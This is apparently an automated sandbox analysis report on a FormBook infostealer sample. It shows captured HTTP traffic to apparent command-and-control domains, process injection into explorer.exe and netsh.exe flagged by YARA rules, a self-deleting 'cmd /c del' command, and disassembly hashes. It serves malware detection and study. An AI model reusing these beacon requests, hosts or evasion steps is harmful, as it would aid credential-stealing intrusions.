                        Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='5; url=http://www.royaldears.com/' />a </head>9 <body>3a You are being redirected to http://www.royaldears.coma </body>8</html>0


                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                        2 | 192.168.2.6 | 49821 | 142.252.22.166 | 80 | C:\Windows\explorer.exe
                        Timestamp | kBytes transferred | Direction | Data
                        Nov 25, 2021 15:11:46.852530956 CET | 16564 | OUT | GET /udeh/?Ipp=dUteF4ZXLzuJCUcYdQc1YLLQWaT61UR38kyqHblZtlDA/JK3c3P/1iwgVtH+FS5JjCNv5C6f7A==&w8e=oTrd HTTP/1.1
                        Host: www.dragonmodz.net
                        Connection: close
                        Data Raw: 00 00 00 00 00 00 00
                        Data Ascii:
                        Nov 25, 2021 15:11:47.031126976 CET | 16565 | IN | HTTP/1.1 200 OK
                        Server: nginx
                        Date: Thu, 25 Nov 2021 14:11:46 GMT
                        Content-Type: text/html
                        Content-Length: 1886
                        Connection: close
                        Vary: Accept-Encoding
                        Data Raw: 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 74 69 74 6c 65 3d 27 ba a3 b6 ab c3 c3 ba b1 c6 fb b3 b5 ce ac d0 de cd b6 d7 ca d3 d0 cf de b9 ab cb be 27 3b 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 74 69 74 6c 65 3e 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 34 34 3b 26 23 33 33 33 39 34 3b 26 23 33 39 33 32 31 3b 26 23 33 34 31 32 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 34 34 33 33 3b 26 23 33 35 32 37 30 3b 2c 26 23 32 33 35 34 35 3b 26 23 33 30 35 32 38 3b 26 23 33 38 32 33 36 3b 26 23 32 33 33 37 36 3b 26 23 32 31 35 31 38 3b 26 23 32 30 38 33 37 3b 26 23 32 33 35 36 37 3b 26 23 32 38 31 36 35 3b 26 23 32 36 30 33 32 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 
31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 34 34 3b 26 23 33 33 33 39 34 3b 26 23 33 39 33 32 31 3b 26 23 33 34 31 32 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 32 32 33 31 32 3b 26 23 33 32 34 34 37 3b 26 23 32 34 34 33 33 3b 26 23 33 35 32 37 30 3b 2c 26 23 32 33 35 34 35 3b 26 23 33 30 35 32 38 3b 26 23 33 38 32 33 36 3b 26 23 32 33 33 37 36 3b 26 23 32 31 35 31 38 3b 26 23 32 30 38 33 37 3b 26 23 32 33 35 36 37 3b 26 23 32 38 31 36 35 3b 26 23 32 36 30 33 32 3b 26 23 32 32 32 36 39 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 22 20 2f 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 26 23 32 30 31 32 32 3b 26 23 32 37 39 35 34 3b 26 23 33 31 35 33 32 3b 26 23 31 39 39 36 38 3b 26 23 38 33 3b 26 23 36 39 3b 26 23 32 34 37 37 33 3b 26 23 33 32 35 39 33 3b 26 23 33 31 34 34 39 3b 26 23 34 34 3b 26 23 33 39 36 34 30 3b 26 23 32 38 31 36 35 3b 26 23 32 32 32 36 39 3b 26 23 33 35 38 32 31 3b 26 23 33 33 32 35 38 3b 26 23 32 30 31 33 35 3b 26 23 33 31 39 33 34 3b 26 23 32 31 36 39 37 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 26 23 32 30 31 30 38 3b 26
                        Data Ascii: <html xmlns="http://www.w3.org/1999/xhtml"><head><script>document.title='';</script><title>&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&#21306;&#22312;&#44;&#33394;&#39321;&#34121;&#35270;&#39057;,&#20037;&#20037;&#22269;&#20135;&#31934;&#21697;&#22312;&#32447;&#24433;&#35270;,&#23545;&#30528;&#38236;&#23376;&#21518;&#20837;&#23567;&#28165;&#26032;&#22269;&#20135;&#31934;&#21697;</title><meta name="keywords" content="&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&#21306;&#22312;&#44;&#33394;&#39321;&#34121;&#35270;&#39057;,&#20037;&#20037;&#22269;&#20135;&#31934;&#21697;&#22312;&#32447;&#24433;&#35270;,&#23545;&#30528;&#38236;&#23376;&#21518;&#20837;&#23567;&#28165;&#26032;&#22269;&#20135;&#31934;&#21697;" /><meta name="description" content="&#20122;&#27954;&#31532;&#19968;&#83;&#69;&#24773;&#32593;&#31449;&#44;&#39640;&#28165;&#22269;&#35821;&#33258;&#20135;&#31934;&#21697;&#35270;&#39057;&#20108;&
                        Nov 25, 2021 15:11:47.031146049 CET | 16566 | IN | Data Raw: 23 32 31 33 30 36 3b 26 23 32 32 33 31 32 3b 26 23 34 34 3b 26 23 33 33 33 39 34 3b 26 23 33 39 33 32 31 3b 26 23 33 34 31 32 31 3b 26 23 33 35 32 37 30 3b 26 23 33 39 30 35 37 3b 2c 26 23 32 30 30 33 37 3b 26 23 32 30 30 33 37 3b 26 23 32 32 32
                        Data Ascii: #21306;&#22312;&#44;&#33394;&#39321;&#34121;&#35270;&#39057;,&#20037;&#20037;&#22269;&#20135;&#31934;&#21697;&#22312;&#32447;&#24433;&#35270;,&#23545;&#30528;&#38236;&#23376;&#21518;&#20837;&#23567;&#28165;&#26032;&#22269;&#20135;&#31934;&#216


                        Code Manipulations

                        Statistics

                        CPU Usage

                        Memory Usage

                        High Level Behavior Distribution

                        Behavior

                        System Behavior

                        General

                        Start time:15:10:13
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
                        Imagebase:0x8e0000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Yara matches:
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.357245488.0000000002BD1000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.357490796.0000000002C9A000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.358483058.0000000003DF6000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Start time:15:10:16
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Imagebase:0x2f0000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low

                        General

                        Start time:15:10:18
                        Start date:25/11/2021
                        Path:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe
                        Imagebase:0x560000
                        File size:445440 bytes
                        MD5 hash:5F19B9A3E41EF2E6EC3200BF4A246CEC
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.354564190.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000000.355165380.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.433824497.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.434217315.0000000000F80000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.434604641.00000000012F0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:low

                        General

                        Start time:15:10:20
                        Start date:25/11/2021
                        Path:C:\Windows\explorer.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\Explorer.EXE
                        Imagebase:0x7ff6f22f0000
                        File size:3933184 bytes
                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.407619289.000000000E6B1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.392202181.000000000E6B1000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Start time:15:10:53
                        Start date:25/11/2021
                        Path:C:\Windows\SysWOW64\netsh.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\netsh.exe
                        Imagebase:0x9e0000
                        File size:82944 bytes
                        MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.612178801.00000000033D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.611462047.0000000003090000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: Joe Security
                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.611332367.0000000002DC0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                        Reputation:high

                        General

                        Start time:15:10:57
                        Start date:25/11/2021
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:/c del "C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe"
                        Imagebase:0x2a0000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:15:10:58
                        Start date:25/11/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff61de10000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Disassembly

                        Code Analysis

                          Executed Functions

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID: d
                          • API String ID: 0-2564639436
                          • Opcode ID: c7e8b8f9c2b491c0de9f5d3dffa899dd3a8c47c6477579237a1e2a54b3e14688
                          • Instruction ID: 4713bf8759925db837352df6f89cae297227f0876e634d3d3299b0cb6d8596cf
                          • Opcode Fuzzy Hash: c7e8b8f9c2b491c0de9f5d3dffa899dd3a8c47c6477579237a1e2a54b3e14688
                          • Instruction Fuzzy Hash: 55C23C74B002198FCB18EF69D555AA9B7B2FF89304F2184E9D90A9B395DB30DD81CF50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b1f4070886bb518445f618ca5fb664a69e20399b2f02ad7d34ebe1cfdd9d33f6
                          • Instruction ID: 2d23093bfb2aa96f32c68377603db557cafa955dff096f8d583e49032c971927
                          • Opcode Fuzzy Hash: b1f4070886bb518445f618ca5fb664a69e20399b2f02ad7d34ebe1cfdd9d33f6
                          • Instruction Fuzzy Hash: D422F031A042598FDF14EF74C4947BD7BB2EF86208F1988B9D8169B292DB34DC45CB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 02B94522
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: f39ec5d766cb96d67d6066cd47c9e33e4a57eb334ec618a5f86b79b8505b1c28
                          • Instruction ID: f93288b469d97f2d78b5484be064260b6a657b4a68ac706f93bb1aedd758b8d6
                          • Opcode Fuzzy Hash: f39ec5d766cb96d67d6066cd47c9e33e4a57eb334ec618a5f86b79b8505b1c28
                          • Instruction Fuzzy Hash: 192147B19102448FCF60DFA9D94839EBFF4EB59318F2488ADD409A2642D7799500CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 02B947CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 755d7a0b83a0bbac5643fde6ebfc34a747a159d1926f643ffaab2240307b146b
                          • Instruction ID: 3dc93f4ff85aa774df0cbd819f12303c6934218e5cfd5ce4ab8545aef6439d2b
                          • Opcode Fuzzy Hash: 755d7a0b83a0bbac5643fde6ebfc34a747a159d1926f643ffaab2240307b146b
                          • Instruction Fuzzy Hash: B7215CB58103898FDF20DFA4D64839ABFF8EF09318F1449AAD455E3682DB399505CF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 02B94522
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 446aabb544884be7a6d28701a51ccb49f0398f5250dce02f240ac99cd6c7ee43
                          • Instruction ID: 258766319f5a15ff91c34ae8e9bc38dac8c07671606c28a3bc3afc6af9c93480
                          • Opcode Fuzzy Hash: 446aabb544884be7a6d28701a51ccb49f0398f5250dce02f240ac99cd6c7ee43
                          • Instruction Fuzzy Hash: 2C115C70A102458FCF20DF99D94879EBFF4FB49318F248869D405A3742D779A541CFA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEncodePointer.NTDLL(00000000), ref: 02B947CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.357185909.0000000002B90000.00000040.00000001.sdmp, Offset: 02B90000, based on PE: false
                          Similarity
                          • API ID: EncodePointer
                          • String ID:
                          • API String ID: 2118026453-0
                          • Opcode ID: 1e62ff61e330e2eb886906a3774ccda47288450377f75b2ba8e427ca2300aeba
                          • Instruction ID: b8ef5084d961354a4263095e200cb1e04937cfd23b5389fddb13b239bf045edf
                          • Opcode Fuzzy Hash: 1e62ff61e330e2eb886906a3774ccda47288450377f75b2ba8e427ca2300aeba
                          • Instruction Fuzzy Hash: 501197B48103888FDB20DF98D54879ABFF8EF08318F204869D415A3281CB79A505CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          • Opcode Fuzzy Hash: db337124945f9446cd54cb5ccb38aa05557a4e935cb9a8996186cade16d481f6
                          • Instruction Fuzzy Hash: 92F0E2B2B001246F93148A6BDC84D6BBBEDEBCD264B558179F40CC7351D9309C00C7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.356923619.000000000110D000.00000040.00000001.sdmp, Offset: 0110D000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 946c11aa45d5a6ca7b8cdaba0726001d60f0e132fbe9c9487e81788d06107437
                          • Instruction ID: 49851bc9c3774f755c2b44f2d123b61404f0b867701227b926143786af522517
                          • Opcode Fuzzy Hash: 946c11aa45d5a6ca7b8cdaba0726001d60f0e132fbe9c9487e81788d06107437
                          • Instruction Fuzzy Hash: 7CF0C2718042449AEB258E59DD84B66FF98EB41234F18C45AED180B386D3B8A844CAB1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 029e991e5fde381f2bd795028446b01cd39ff107d6f0fb740299727f12a4b505
                          • Instruction ID: 9b9d37ef5c5d43ba612a918b74e9c98ede25422dadfd6755b0ef93584e9ff12f
                          • Opcode Fuzzy Hash: 029e991e5fde381f2bd795028446b01cd39ff107d6f0fb740299727f12a4b505
                          • Instruction Fuzzy Hash: C2014FB1C00219EFDB18DF65C5083BD7AF1FF08311F148625E825AB290D7744A54CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5427e92adea770d10d04eb299024dfb3709e673245d8be195ff1c65570a498d3
                          • Instruction ID: 991e231906df41aaa807f994c351f027d023945156085353a210c1edc188caa0
                          • Opcode Fuzzy Hash: 5427e92adea770d10d04eb299024dfb3709e673245d8be195ff1c65570a498d3
                          • Instruction Fuzzy Hash: 9D01E870800219EFDB18DF6AC4083AEBAF5FF48351F108225E825AB290D7B44A54CBD1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: efd6b0355094612a5374fde34f528c70086aa82b57825fcb6e6c2fd24e0b00c4
                          • Instruction ID: 8bc171303289b20f3e746f1ff74fb185d414a3012224302ed03f72b8debe106a
                          • Opcode Fuzzy Hash: efd6b0355094612a5374fde34f528c70086aa82b57825fcb6e6c2fd24e0b00c4
                          • Instruction Fuzzy Hash: 20F0F9B4D10208EFDB48DFA4E6057AEFBB1FB99301F1082AAD825A3344D7714A51CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 396f6057a5cda3d1e4f2ce00dad76008e8d679618d421d7213d08ce28fb00e28
                          • Instruction ID: 54eeb6bbb187d63921d8e3eb68065b3a58a915d1647edb8df4aa85b1042479d4
                          • Opcode Fuzzy Hash: 396f6057a5cda3d1e4f2ce00dad76008e8d679618d421d7213d08ce28fb00e28
                          • Instruction Fuzzy Hash: 4401B274D10209EFCB44EFA8D585AAEBBF1FF49304F108AAAD814A7355D7709A90CF84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 454231c2d7bc90cf4a4609aa729f5815bd1eb78c81e23e287662bff2e24dd244
                          • Instruction ID: 05d55e0af8c5969008f5445f9acf10900b7c3fbc92cd6aef6ef9afb5c83942a6
                          • Opcode Fuzzy Hash: 454231c2d7bc90cf4a4609aa729f5815bd1eb78c81e23e287662bff2e24dd244
                          • Instruction Fuzzy Hash: 13E03972B001286F5314DAAAD884C6BBBEEEBCD664355853AF508C7310DA309C0086A4
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 20a9dbd46560de71c79879391c9c5798df6274183e43267419b5709ae87446bf
                          • Instruction ID: 5596148aa746ae4af15868417150a7c37d0fe502a04a7d5259c7c50165ab8ecb
                          • Opcode Fuzzy Hash: 20a9dbd46560de71c79879391c9c5798df6274183e43267419b5709ae87446bf
                          • Instruction Fuzzy Hash: 1FF034F4C04209ABCB48EFF8D9012EEBFB4FB99301F009AAA8818A3244DB7046148B01
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fa04a18f2c3376ee1c7b7ad75bdeef35abb1f283e7a2d50a340cca7cc26e153
                          • Instruction ID: e28a79038845d8fe5b2aa897c0b585c5e5045ed155777236a3e83dc25c036b95
                          • Opcode Fuzzy Hash: 7fa04a18f2c3376ee1c7b7ad75bdeef35abb1f283e7a2d50a340cca7cc26e153
                          • Instruction Fuzzy Hash: 45F0DA74D04208EFCB48DFA5EA056AEFBB1FB89300F1085AAD824A3344D7705A51DF84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 75cb40b96572535b40ff793deca78fb6f6232c6dc936cea6a3e6f2ef9d580941
                          • Instruction ID: 0bd460e6c695086cb4d4c1aab0f60fc819717360abf8b6c25e7d992abbb66aae
                          • Opcode Fuzzy Hash: 75cb40b96572535b40ff793deca78fb6f6232c6dc936cea6a3e6f2ef9d580941
                          • Instruction Fuzzy Hash: A9E08C327902103BE61E2155986BFBBB24EDBC1A61F50802AFA069E6C5CEE29D064291
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.359513267.0000000005380000.00000040.00000001.sdmp, Offset: 05380000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9b97a700333f59954da634c1815c5acb5f45509dad7b09569967bf39a67893a1
                          • Instruction ID: 642f2f9c756ad674fdff4339e753daef01571e7f0a463eca86ff489bfe76c226
                          • Opcode Fuzzy Hash: 9b97a700333f59954da634c1815c5acb5f45509dad7b09569967bf39a67893a1
                          • Instruction Fuzzy Hash: CBE06D34A01108DBDB40EFA8EB42AEC77B5EB44209B218968C80997604DB311E1A9F41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
